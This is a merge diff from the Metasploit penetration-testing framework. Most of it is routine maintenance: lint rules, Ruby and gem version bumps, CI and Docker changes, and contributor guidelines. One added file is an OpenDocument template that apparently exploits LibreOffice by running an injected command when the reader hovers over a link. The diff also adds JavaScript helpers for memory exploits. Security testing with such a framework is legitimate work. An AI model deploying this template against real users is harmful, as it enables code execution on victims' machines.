Land #11914 , Fix external file import via web service

Land #11954 , Retina XML importer fixes and updates
Add nil check
2019-06-07 06:03:42 -05:00 · 2019-06-07 00:40:28 -05:00 · 2019-06-07 00:16:44 -05:00 · 2019-06-07 00:07:50 -05:00 · 2019-06-06 23:45:07 -05:00 · 2019-06-06 23:38:41 -05:00
679 changed files with 147876 additions and 2047 deletions
@@ -9,7 +9,7 @@
 # inherit_from: .rubocop_todo.yml

 AllCops:
-  TargetRubyVersion: 2.2
+  TargetRubyVersion: 2.4

 Metrics/ClassLength:
  Description: 'Most Metasploit modules are quite large. This is ok.'
@@ -45,6 +45,10 @@ Style/RedundantReturn:
  Description: 'This often looks weird when mixed with actual returns, and hurts nothing'
  Enabled: false

+Naming/VariableNumber:
+  Description: 'To make it easier to use reference code, disable this cop'
+  Enabled: false
+
 Style/NumericPredicate:
  Description: 'This adds no efficiency nor space saving'
  Enabled: false
@@ -55,14 +59,18 @@ Style/Documentation:
  Exclude:
    - 'modules/**/*'

-Layout/IndentHeredoc:
+Layout/SpaceInsideArrayLiteralBrackets:
  Enabled: false
-  Description: 'We need to leave this disabled for Ruby 2.2 compat, remove in 2018'
+  Description: 'Almost all module metadata have space in brackets'

 Style/GuardClause:
  Enabled: false
  Description: 'This often introduces bugs in tested code'

+Style/EmptyLiteral:
+  Enabled: false
+  Description: 'This looks awkward when you mix empty and non-empty literals'
+
 Style/NegatedIf:
  Enabled: false
  Description: 'This often introduces bugs in tested code'
@@ -72,9 +80,16 @@ Style/ConditionalAssignment:
  Description: 'This is confusing for folks coming from other languages'

 Style/Encoding:
-  Enabled: true
  Description: 'We prefer binary to UTF-8.'
-  EnforcedStyle: 'when_needed'
+  Enabled: false
+
+Style/ParenthesesAroundCondition:
+  Enabled: false
+  Description: 'This is used in too many places to discount, especially in ported code. Has little effect'
+
+Style/TrailingCommaInArrayLiteral:
+  Enabled: false
+  Description: 'This is often a useful pattern, and is actually required by other languages. It does not hurt.'

 Metrics/LineLength:
  Description: >-
@@ -83,6 +98,13 @@ Metrics/LineLength:
  Enabled: true
  Max: 180

+Metrics/BlockLength:
+  Enabled: true
+  Description: >-
+                  While the style guide suggests 10 lines, exploit definitions
+                  often exceed 200 lines.
+  Max: 300
+
 Metrics/MethodLength:
  Enabled: true
  Description: >-
@@ -90,10 +112,10 @@ Metrics/MethodLength:
                  often exceed 200 lines.
  Max: 300

-# Basically everything in metasploit needs binary encoding, not UTF-8.
-# Disable this here and enforce it through msftidy
-Style/Encoding:
-  Enabled: false
+Naming/UncommunicativeMethodParamName:
+  Enabled: true
+  Description: 'Whoever made this requirement never looked at crypto methods, IV'
+  MinNameLength: 2

 # %q() is super useful for long strings split over multiple lines and
 # is very common in module constructors for things like descriptions
@@ -104,11 +126,31 @@ Style/NumericLiterals:
  Enabled: false
  Description: 'This often hurts readability for exploit-ish code.'

+Layout/AlignHash:
+  Enabled: false
+  Description: 'aligning info hashes to match these rules is almost impossible to get right'
+
+Layout/EmptyLines:
+  Enabled: false
+  Description: 'these are used to increase readability'
+
+Layout/EmptyLinesAroundClassBody:
+  Enabled: false
+  Description: 'these are used to increase readability'
+
+Layout/EmptyLinesAroundMethodBody:
+  Enabled: false
+  Description: 'these are used to increase readability'
+
 Layout/AlignParameters:
  Enabled: true
  EnforcedStyle: 'with_fixed_indentation'
  Description: 'initialize method of every module has fixed indentation for Name, Description, etc'

+Style/For:
+  Enabled: false
+  Description: 'if a module is written with a for loop, it cannot always be logically replaced with each'
+
 Style/StringLiterals:
  Enabled: false
  Description: 'Single vs double quote fights are largely unproductive.'
@@ -1 +1 @@
-2.5.3
+2.6.2
@@ -11,9 +11,8 @@ addons:
      - graphviz
 language: ruby
 rvm:
-  - '2.3.8'
-  - '2.4.5'
-  - '2.5.3'
+  - '2.5.5'
+  - '2.6.2'

 env:
  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
@@ -24,11 +23,6 @@ env:

 matrix:
  fast_finish: true
-  exclude:
-  - rvm: '2.3.8'
-    env: CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
-  - rvm: '2.4.5'
-    env: CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'

 jobs:
  # build docker image
@@ -20,12 +20,15 @@ it into Metasploit's master branch.  If you do not care to follow these rules, y
 * **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
 * **Do** follow the [50/72 rule] for Git commit messages.
 * **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
-* **Do** create a [topic branch] to work on instead of working directly on `master` to preserve the
-  history of your pull request.  See [PR#8000] for an example of losing commit history as soon as
-  you update your own master branch.
+* **Do** create a [topic branch] to work on instead of working directly on `master`.
+  This helps protect the process, ensures users are aware of commits on the branch being considered for merge,
+  allows for a location for more commits to be offered without mingling with other contributor changes,
+  and allows contributors to make progress while a PR is still being reviewed.
+

 ### Pull Requests

+* **Do** write "WIP" on your PR and/or open a [draft PR] if submitting **working** yet unfinished code.
 * **Do** target your pull request to the **master branch**.
 * **Do** specify a descriptive title to make searching for your pull request easier.
 * **Do** include [console output], especially for witnessable effects in `msfconsole`.
@@ -84,7 +87,7 @@ curve, so keep it up!
 [Rubocop]:https://rubygems.org/search?query=rubocop
 [50/72 rule]:http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html
 [topic branch]:http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches
-[PR#8000]:https://github.com/rapid7/metasploit-framework/pull/8000
+[draft PR]:https://help.github.com/en/articles/about-pull-requests#draft-pull-requests
 [console output]:https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks
 [verification steps]:https://help.github.com/articles/writing-on-github#task-lists
 [reference associated issues]:https://github.com/blog/1506-closing-issues-via-pull-requests
@@ -1,4 +1,4 @@
-FROM ruby:2.5.3-alpine3.7 AS builder
+FROM ruby:2.6.2-alpine3.9 AS builder
 LABEL maintainer="Rapid7"

 ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
@@ -16,7 +16,7 @@ RUN apk add --no-cache \
      bison \
      build-base \
      ruby-dev \
-      libressl-dev \
+      openssl-dev \
      readline-dev \
      sqlite-dev \
      postgresql-dev \
@@ -29,7 +29,6 @@ RUN apk add --no-cache \
      git \
    && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
    && gem update --system \
-    && gem install bundler \
    && bundle install --clean --no-cache --system $BUNDLER_ARGS \
    # temp fix for https://github.com/bundler/bundler/issues/6680
    && rm -rf /usr/local/bundle/cache \
@@ -37,7 +36,7 @@ RUN apk add --no-cache \
    && chmod -R a+r /usr/local/bundle


-FROM ruby:2.5.3-alpine3.7
+FROM ruby:2.6.2-alpine3.9
 LABEL maintainer="Rapid7"

 ENV APP_HOME=/usr/src/metasploit-framework
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (5.0.6)
+    metasploit-framework (5.0.28)
      actionpack (~> 4.2.6)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
@@ -21,9 +21,9 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 1.3.62)
-      metasploit_data_models
-      metasploit_payloads-mettle (= 0.5.7)
+      metasploit-payloads (= 1.3.70)
+      metasploit_data_models (= 3.0.10)
+      metasploit_payloads-mettle (= 0.5.16)
      mqtt
      msgpack
      nessus_rest
@@ -80,40 +80,40 @@ GEM
  remote: https://rubygems.org/
  specs:
    Ascii85 (1.0.3)
-    actionpack (4.2.11)
-      actionview (= 4.2.11)
-      activesupport (= 4.2.11)
+    actionpack (4.2.11.1)
+      actionview (= 4.2.11.1)
+      activesupport (= 4.2.11.1)
      rack (~> 1.6)
      rack-test (~> 0.6.2)
      rails-dom-testing (~> 1.0, >= 1.0.5)
      rails-html-sanitizer (~> 1.0, >= 1.0.2)
-    actionview (4.2.11)
-      activesupport (= 4.2.11)
+    actionview (4.2.11.1)
+      activesupport (= 4.2.11.1)
      builder (~> 3.1)
      erubis (~> 2.7.0)
      rails-dom-testing (~> 1.0, >= 1.0.5)
      rails-html-sanitizer (~> 1.0, >= 1.0.3)
-    activemodel (4.2.11)
-      activesupport (= 4.2.11)
+    activemodel (4.2.11.1)
+      activesupport (= 4.2.11.1)
      builder (~> 3.1)
-    activerecord (4.2.11)
-      activemodel (= 4.2.11)
-      activesupport (= 4.2.11)
+    activerecord (4.2.11.1)
+      activemodel (= 4.2.11.1)
+      activesupport (= 4.2.11.1)
      arel (~> 6.0)
-    activesupport (4.2.11)
+    activesupport (4.2.11.1)
      i18n (~> 0.7)
      minitest (~> 5.1)
      thread_safe (~> 0.3, >= 0.3.4)
      tzinfo (~> 1.1)
-    addressable (2.5.2)
+    addressable (2.6.0)
      public_suffix (>= 2.0.2, < 4.0)
    afm (0.2.2)
    arel (6.0.4)
    arel-helpers (2.8.0)
      activerecord (>= 3.1.0, < 6)
-    backports (3.11.4)
-    bcrypt (3.1.12)
-    bcrypt_pbkdf (1.0.0)
+    backports (3.15.0)
+    bcrypt (3.1.13)
+    bcrypt_pbkdf (1.0.1)
    bindata (2.4.4)
    bit-struct (0.16)
    builder (3.2.3)
@@ -137,12 +137,12 @@ GEM
      eventmachine (>= 1.0.0.beta.4)
    erubis (2.7.0)
    eventmachine (1.2.7)
-    factory_bot (5.0.0)
+    factory_bot (5.0.2)
      activesupport (>= 4.2.0)
-    factory_bot_rails (5.0.0)
-      factory_bot (~> 5.0.0)
+    factory_bot_rails (5.0.2)
+      factory_bot (~> 5.0.2)
      railties (>= 4.2.0)
-    faker (1.9.1)
+    faker (1.9.3)
      i18n (>= 0.7)
    faraday (0.15.4)
      multipart-post (>= 1.2, < 3)
@@ -154,11 +154,11 @@ GEM
      concurrent-ruby (~> 1.0)
    jsobfu (0.4.2)
      rkelly-remix
-    json (2.1.0)
+    json (2.2.0)
    loofah (2.2.3)
      crass (~> 1.0.2)
      nokogiri (>= 1.5.9)
-    metasm (1.0.3)
+    metasm (1.0.4)
    metasploit-concern (2.0.5)
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
@@ -177,8 +177,8 @@ GEM
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-payloads (1.3.62)
-    metasploit_data_models (3.0.5)
+    metasploit-payloads (1.3.70)
+    metasploit_data_models (3.0.10)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
      arel-helpers
@@ -188,20 +188,20 @@ GEM
      postgres_ext
      railties (~> 4.2.6)
      recog (~> 2.0)
-    metasploit_payloads-mettle (0.5.7)
+    metasploit_payloads-mettle (0.5.16)
    method_source (0.9.2)
    mini_portile2 (2.4.0)
    minitest (5.11.3)
    mqtt (0.5.0)
-    msgpack (1.2.6)
-    multipart-post (2.0.0)
+    msgpack (1.2.10)
+    multipart-post (2.1.1)
    nessus_rest (0.1.6)
-    net-ssh (5.1.0)
+    net-ssh (5.2.0)
    network_interface (0.0.2)
    nexpose (7.2.1)
-    nokogiri (1.10.1)
+    nokogiri (1.10.3)
      mini_portile2 (~> 2.4.0)
-    octokit (4.13.0)
+    octokit (4.14.0)
      sawyer (~> 0.8.0, >= 0.5.3)
    openssl-ccm (1.2.2)
    openvas-omp (0.0.4)
@@ -224,7 +224,7 @@ GEM
    pry (0.12.2)
      coderay (~> 1.1.0)
      method_source (~> 0.9.0)
-    public_suffix (3.0.3)
+    public_suffix (3.1.0)
    rack (1.6.11)
    rack-protection (1.5.5)
      rack
@@ -238,14 +238,14 @@ GEM
      rails-deprecated_sanitizer (>= 1.0.1)
    rails-html-sanitizer (1.0.4)
      loofah (~> 2.2, >= 2.2.2)
-    railties (4.2.11)
-      actionpack (= 4.2.11)
-      activesupport (= 4.2.11)
+    railties (4.2.11.1)
+      actionpack (= 4.2.11.1)
+      activesupport (= 4.2.11.1)
      rake (>= 0.8.7)
      thor (>= 0.18.1, < 2.0)
    rake (12.3.2)
    rb-readline (0.5.5)
-    recog (2.1.45)
+    recog (2.3.2)
      nokogiri
    redcarpet (3.4.0)
    rex-arch (0.1.13)
@@ -261,7 +261,7 @@ GEM
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.20)
+    rex-exploitation (0.1.21)
      jsobfu
      metasm
      rex-arch
@@ -274,7 +274,7 @@ GEM
      rex-arch
    rex-ole (0.1.6)
      rex-text
-    rex-powershell (0.1.79)
+    rex-powershell (0.1.82)
      rex-random_identifier
      rex-text
    rex-random_identifier (0.1.4)
@@ -284,7 +284,7 @@ GEM
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.15)
+    rex-socket (0.1.17)
      rex-core
    rex-sslscan (0.1.5)
      rex-core
@@ -301,7 +301,7 @@ GEM
      rspec-mocks (~> 3.8.0)
    rspec-core (3.8.0)
      rspec-support (~> 3.8.0)
-    rspec-expectations (3.8.2)
+    rspec-expectations (3.8.3)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.8.0)
    rspec-mocks (3.8.0)
@@ -318,17 +318,17 @@ GEM
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
    rspec-support (3.8.0)
-    ruby-macho (2.1.0)
+    ruby-macho (2.2.0)
    ruby-rc4 (0.1.5)
    ruby_smb (1.0.5)
      bindata
      rubyntlm
      windows_error
    rubyntlm (0.6.2)
-    rubyzip (1.2.2)
-    sawyer (0.8.1)
-      addressable (>= 2.3.5, < 2.6)
-      faraday (~> 0.8, < 1.0)
+    rubyzip (1.2.3)
+    sawyer (0.8.2)
+      addressable (>= 2.3.5)
+      faraday (> 0.8, < 2.0)
    simplecov (0.16.1)
      docile (~> 1.1)
      json (>= 1.8, < 3)
@@ -339,7 +339,7 @@ GEM
      rack-protection (~> 1.4)
      tilt (>= 1.3, < 3)
    sqlite3 (1.3.13)
-    sshkey (1.9.0)
+    sshkey (2.0.0)
    swagger-blocks (2.0.2)
    thin (1.7.2)
      daemons (~> 1.0, >= 1.0.9)
@@ -352,7 +352,7 @@ GEM
    ttfunk (1.5.1)
    tzinfo (1.2.5)
      thread_safe (~> 0.1)
-    tzinfo-data (1.2018.9)
+    tzinfo-data (1.2019.1)
      tzinfo (>= 1.0.0)
    warden (1.2.7)
      rack (>= 1.0)
@@ -361,7 +361,7 @@ GEM
      activemodel (>= 4.2.7)
      activesupport (>= 4.2.7)
    xmlrpc (0.3.0)
-    yard (0.9.18)
+    yard (0.9.19)

 PLATFORMS
  ruby
@@ -1,17 +1,17 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
 Ascii85, 1.0.3, MIT
-actionpack, 4.2.11, MIT
-actionview, 4.2.11, MIT
-activemodel, 4.2.11, MIT
-activerecord, 4.2.11, MIT
-activesupport, 4.2.11, MIT
-addressable, 2.5.2, "Apache 2.0"
+actionpack, 4.2.11.1, MIT
+actionview, 4.2.11.1, MIT
+activemodel, 4.2.11.1, MIT
+activerecord, 4.2.11.1, MIT
+activesupport, 4.2.11.1, MIT
+addressable, 2.6.0, "Apache 2.0"
 afm, 0.2.2, MIT
 arel, 6.0.4, MIT
 arel-helpers, 2.8.0, MIT
-backports, 3.11.4, MIT
-bcrypt, 3.1.12, MIT
-bcrypt_pbkdf, 1.0.0, MIT
+backports, 3.15.0, MIT
+bcrypt, 3.1.13, MIT
+bcrypt_pbkdf, 1.0.1, MIT
 bindata, 2.4.4, ruby
 bit-struct, 0.16, ruby
 builder, 3.2.3, MIT
@@ -29,9 +29,9 @@ em-http-request, 1.1.5, MIT
 em-socksify, 0.3.2, MIT
 erubis, 2.7.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
-factory_bot, 5.0.0, MIT
-factory_bot_rails, 5.0.0, MIT
-faker, 1.9.1, MIT
+factory_bot, 5.0.2, MIT
+factory_bot_rails, 5.0.2, MIT
+faker, 1.9.3, MIT
 faraday, 0.15.4, MIT
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
@@ -39,64 +39,64 @@ hashery, 2.1.2, "Simplified BSD"
 http_parser.rb, 0.6.0, MIT
 i18n, 0.9.5, MIT
 jsobfu, 0.4.2, "New BSD"
-json, 2.1.0, ruby
+json, 2.2.0, ruby
 loofah, 2.2.3, MIT
-metasm, 1.0.3, LGPL
+metasm, 1.0.4, LGPL-2.1
 metasploit-concern, 2.0.5, "New BSD"
 metasploit-credential, 3.0.3, "New BSD"
-metasploit-framework, 5.0.6, "New BSD"
+metasploit-framework, 5.0.28, "New BSD"
 metasploit-model, 2.0.4, "New BSD"
-metasploit-payloads, 1.3.61, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 3.0.5, "New BSD"
-metasploit_payloads-mettle, 0.5.7, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 1.3.70, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 3.0.10, "New BSD"
+metasploit_payloads-mettle, 0.5.16, "3-clause (or ""modified"") BSD"
 method_source, 0.9.2, MIT
 mini_portile2, 2.4.0, MIT
 minitest, 5.11.3, MIT
 mqtt, 0.5.0, MIT
-msgpack, 1.2.6, "Apache 2.0"
-multipart-post, 2.0.0, MIT
+msgpack, 1.2.10, "Apache 2.0"
+multipart-post, 2.1.1, MIT
 nessus_rest, 0.1.6, MIT
-net-ssh, 5.1.0, MIT
+net-ssh, 5.2.0, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.2.1, "New BSD"
-nokogiri, 1.10.1, MIT
-octokit, 4.13.0, MIT
+nokogiri, 1.10.3, MIT
+octokit, 4.14.0, MIT
 openssl-ccm, 1.2.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.0, LGPL-2.1
 pdf-reader, 2.2.0, MIT
-pg, 0.20.0, "New BSD"
+pg, 0.21.0, "New BSD"
 pg_array_parser, 0.0.9, unknown
 postgres_ext, 3.0.1, MIT
 pry, 0.12.2, MIT
-public_suffix, 3.0.3, MIT
+public_suffix, 3.1.0, MIT
 rack, 1.6.11, MIT
 rack-protection, 1.5.5, MIT
 rack-test, 0.6.3, MIT
 rails-deprecated_sanitizer, 1.0.3, MIT
 rails-dom-testing, 1.0.9, MIT
 rails-html-sanitizer, 1.0.4, MIT
-railties, 4.2.11, MIT
+railties, 4.2.11.1, MIT
 rake, 12.3.2, MIT
 rb-readline, 0.5.5, BSD
-recog, 2.1.45, unknown
+recog, 2.3.2, unknown
 redcarpet, 3.4.0, MIT
 rex-arch, 0.1.13, "New BSD"
 rex-bin_tools, 0.1.6, "New BSD"
 rex-core, 0.1.13, "New BSD"
 rex-encoder, 0.1.4, "New BSD"
-rex-exploitation, 0.1.20, "New BSD"
+rex-exploitation, 0.1.21, "New BSD"
 rex-java, 0.1.5, "New BSD"
 rex-mime, 0.1.5, "New BSD"
 rex-nop, 0.1.1, "New BSD"
 rex-ole, 0.1.6, "New BSD"
-rex-powershell, 0.1.79, "New BSD"
+rex-powershell, 0.1.82, "New BSD"
 rex-random_identifier, 0.1.4, "New BSD"
 rex-registry, 0.1.3, "New BSD"
 rex-rop_builder, 0.1.3, "New BSD"
-rex-socket, 0.1.15, "New BSD"
+rex-socket, 0.1.17, "New BSD"
 rex-sslscan, 0.1.5, "New BSD"
 rex-struct2, 0.1.2, "New BSD"
 rex-text, 0.2.21, "New BSD"
@@ -104,22 +104,22 @@ rex-zip, 0.1.3, "New BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.8.0, MIT
 rspec-core, 3.8.0, MIT
-rspec-expectations, 3.8.2, MIT
+rspec-expectations, 3.8.3, MIT
 rspec-mocks, 3.8.0, MIT
 rspec-rails, 3.8.2, MIT
 rspec-rerun, 1.1.0, MIT
 rspec-support, 3.8.0, MIT
-ruby-macho, 2.1.0, MIT
+ruby-macho, 2.2.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby_smb, 1.0.5, "New BSD"
 rubyntlm, 0.6.2, MIT
-rubyzip, 1.2.2, "Simplified BSD"
-sawyer, 0.8.1, MIT
+rubyzip, 1.2.3, "Simplified BSD"
+sawyer, 0.8.2, MIT
 simplecov, 0.16.1, MIT
 simplecov-html, 0.10.2, MIT
 sinatra, 1.4.8, MIT
 sqlite3, 1.3.13, "New BSD"
-sshkey, 1.9.0, MIT
+sshkey, 2.0.0, MIT
 swagger-blocks, 2.0.2, MIT
 thin, 1.7.2, "GPLv2+, Ruby 1.8"
 thor, 0.20.3, MIT
@@ -128,9 +128,9 @@ tilt, 2.0.9, MIT
 timecop, 0.9.1, MIT
 ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
 tzinfo, 1.2.5, MIT
-tzinfo-data, 1.2018.9, MIT
+tzinfo-data, 1.2019.1, MIT
 warden, 1.2.7, MIT
 windows_error, 0.1.2, BSD
 xdr, 2.0.0, "Apache 2.0"
 xmlrpc, 0.3.0, ruby
-yard, 0.9.18, MIT
+yard, 0.9.19, MIT
@@ -31,7 +31,6 @@ Vagrant.configure(2) do |config|
  [ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3",
    "curl -L https://get.rvm.io | bash -s stable",
    "source ~/.rvm/scripts/rvm && cd /vagrant && rvm install `cat .ruby-version`",
-    "source ~/.rvm/scripts/rvm && cd /vagrant && gem install bundler",
    "source ~/.rvm/scripts/rvm && cd /vagrant && bundle",
    "mkdir -p ~/.msf4",
  ].each do |step|
@@ -22,11 +22,26 @@ unless ENV['BUNDLE_GEMFILE']
  end
 end

+# Remove bigdecimal warning - start
+# https://github.com/ruby/bigdecimal/pull/115
+# https://github.com/rapid7/metasploit-framework/pull/11184#issuecomment-461971266
+# TODO: remove when upgrading from rails 4.x
+require 'bigdecimal'
+
+def BigDecimal.new(*args, **kwargs)
+  return BigDecimal(*args) if kwargs.empty?
+  BigDecimal(*args, **kwargs)
+end
+# Remove bigdecimal warning - end
+
 begin
  require 'bundler/setup'
-rescue LoadError
-  $stderr.puts "[*] Metasploit requires the Bundler gem to be installed"
-  $stderr.puts "    $ gem install bundler"
+rescue LoadError => e
+  $stderr.puts "[*] Bundler failed to load and returned this error:"
+  $stderr.puts
+  $stderr.puts "   '#{e}'"
+  $stderr.puts
+  $stderr.puts "[*] You may need to uninstall or upgrade bundler"
  exit(1)
 end

@@ -0,0 +1,46 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<office:document xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" xmlns:style="urn:oasis:names:tc:opendocument:xmlns:style:1.0" xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" xmlns:table="urn:oasis:names:tc:opendocument:xmlns:table:1.0" xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0" xmlns:fo="urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0" xmlns:number="urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0" xmlns:svg="urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0" xmlns:chart="urn:oasis:names:tc:opendocument:xmlns:chart:1.0" xmlns:dr3d="urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0" xmlns:math="http://www.w3.org/1998/Math/MathML" xmlns:form="urn:oasis:names:tc:opendocument:xmlns:form:1.0" xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0" xmlns:config="urn:oasis:names:tc:opendocument:xmlns:config:1.0" xmlns:ooo="http://openoffice.org/2004/office" xmlns:ooow="http://openoffice.org/2004/writer" xmlns:oooc="http://openoffice.org/2004/calc" xmlns:dom="http://www.w3.org/2001/xml-events" xmlns:xforms="http://www.w3.org/2002/xforms" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:rpt="http://openoffice.org/2005/report" xmlns:of="urn:oasis:names:tc:opendocument:xmlns:of:1.2" xmlns:xhtml="http://www.w3.org/1999/xhtml" xmlns:grddl="http://www.w3.org/2003/g/data-view#" xmlns:officeooo="http://openoffice.org/2009/office" xmlns:tableooo="http://openoffice.org/2009/table" xmlns:drawooo="http://openoffice.org/2010/draw" xmlns:calcext="urn:org:documentfoundation:names:experimental:calc:xmlns:calcext:1.0" xmlns:loext="urn:org:documentfoundation:names:experimental:office:xmlns:loext:1.0" xmlns:field="urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0" xmlns:formx="urn:openoffice:names:experimental:ooxml-odf-interop:xmlns:form:1.0" xmlns:css3t="http://www.w3.org/TR/css3-text/" office:version="1.2" office:mimetype="application/vnd.oasis.opendocument.text">
+ <office:meta><meta:creation-date>2019-01-30T10:53:06.762000000</meta:creation-date><dc:date>2019-01-30T10:53:49.512000000</dc:date><meta:editing-duration>PT44S</meta:editing-duration><meta:editing-cycles>1</meta:editing-cycles><meta:document-statistic meta:table-count="0" meta:image-count="0" meta:object-count="0" meta:page-count="1" meta:paragraph-count="1" meta:word-count="1" meta:character-count="4" meta:non-whitespace-character-count="4"/><meta:generator>LibreOffice/6.1.2.1$Windows_X86_64 LibreOffice_project/65905a128db06ba48db947242809d14d3f9a93fe</meta:generator></office:meta>
+ <office:scripts>
+  <office:script script:language="ooo:Basic">
+   <ooo:libraries xmlns:ooo="http://openoffice.org/2004/office" xmlns:xlink="http://www.w3.org/1999/xlink">
+    <ooo:library-embedded ooo:name="Standard"/>
+   </ooo:libraries>
+  </office:script>
+ </office:scripts>
+ <office:styles>
+  <style:default-style style:family="graphic">
+   <style:graphic-properties svg:stroke-color="#3465a4" draw:fill-color="#729fcf" fo:wrap-option="no-wrap" draw:shadow-offset-x="0.1181in" draw:shadow-offset-y="0.1181in" draw:start-line-spacing-horizontal="0.1114in" draw:start-line-spacing-vertical="0.1114in" draw:end-line-spacing-horizontal="0.1114in" draw:end-line-spacing-vertical="0.1114in" style:flow-with-text="false"/>
+   <style:paragraph-properties style:text-autospace="ideograph-alpha" style:line-break="strict" style:font-independent-line-spacing="false">
+    <style:tab-stops/>
+   </style:paragraph-properties>
+   <style:text-properties style:use-window-font-color="true" style:font-name="Liberation Serif" fo:font-size="96pt" fo:language="en" fo:country="US" style:letter-kerning="true" style:font-name-asian="NSimSun" style:font-size-asian="96pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Arial" style:font-size-complex="96pt" style:language-complex="hi" style:country-complex="IN"/>
+  </style:default-style>
+  <style:default-style style:family="paragraph">
+   <style:paragraph-properties fo:orphans="2" fo:widows="2" fo:hyphenation-ladder-count="no-limit" style:text-autospace="ideograph-alpha" style:punctuation-wrap="hanging" style:line-break="strict" style:tab-stop-distance="0.4925in" style:writing-mode="page"/>
+   <style:text-properties style:use-window-font-color="true" style:font-name="Liberation Serif" fo:font-size="96pt" fo:language="en" fo:country="US" style:letter-kerning="true" style:font-name-asian="NSimSun" style:font-size-asian="96pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Arial" style:font-size-complex="96pt" style:language-complex="hi" style:country-complex="IN" fo:hyphenate="false" fo:hyphenation-remain-char-count="2" fo:hyphenation-push-char-count="2"/>
+  </style:default-style>
+  <style:default-style style:family="table">
+   <style:table-properties table:border-model="collapsing"/>
+  </style:default-style>
+  <style:default-style style:family="table-row">
+   <style:table-row-properties fo:keep-together="auto"/>
+  </style:default-style>
+  <style:style style:name="Standard" style:family="paragraph" style:class="text"/>
+  <style:style style:name="Text_20_body" style:display-name="Text body" style:family="paragraph" style:parent-style-name="Standard" style:class="text">
+   <style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0.0972in" loext:contextual-spacing="false" fo:line-height="115%"/>
+  </style:style>
+  <style:style style:name="Internet_20_link" style:display-name="Internet link" style:family="text">
+   <style:text-properties fo:color="#ffffff" fo:language="zxx" fo:country="none" style:text-underline-style="solid" style:text-underline-width="auto" style:text-underline-color="font-color" style:language-asian="zxx" style:country-asian="none" style:language-complex="zxx" style:country-complex="none"/>
+  </style:style>
+ </office:styles>
+ <office:master-styles>
+  <style:master-page style:name="Standard" style:page-layout-name="pm1"/>
+ </office:master-styles>
+ <office:body>
+  <office:text>
+   <text:p text:style-name="Standard"><text:a xlink:type="simple" xlink:href="http://<%=text_content%>/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><office:event-listeners><script:event-listener script:language="ooo:script" script:event-name="dom:mouseover" xlink:href="vnd.sun.star.script:<%= path %>$tempfilepager(1, <%= @cmd %>)?language=Python&amp;location=share" xlink:type="simple"/></office:event-listeners><text:span text:style-name="T1"><%= text_content %></text:span></text:a></text:p>
+  </office:text>
+ </office:body>
+</office:document>
@@ -79,6 +79,18 @@ function Int64(v) {
        return '0x' + hexlify(Array.from(bytes).reverse());
    };

+    this.lo = function()
+    {
+        var b = this.bytes();
+        return (b[0] | (b[1] << 8) | (b[2] << 16) | (b[3] << 24)) >>> 0;
+    };
+
+    this.hi = function()
+    {
+        var b = this.bytes();
+        return (b[4] | (b[5] << 8) | (b[6] << 16) | (b[7] << 24)) >>> 0;
+    };
+
    // Basic arithmetic.
    // These functions assign the result of the computation to their 'this' object.

@@ -46,6 +46,139 @@ function hexdump(data) {
    return lines.join('\n');
 }

+function strcmp(b, str)
+{
+    var fn = typeof b == "function" ? b : function(i) { return b[i]; };
+    for(var i = 0; i < str.length; ++i)
+    {
+        if(fn(i) != str.charCodeAt(i))
+        {
+            return false;
+        }
+    }
+    return fn(str.length) == 0;
+}
+
+function b2u32(b)
+{
+    return (b[0] | (b[1] << 8) | (b[2] << 16) | (b[3] << 24)) >>> 0;
+}
+
+
+
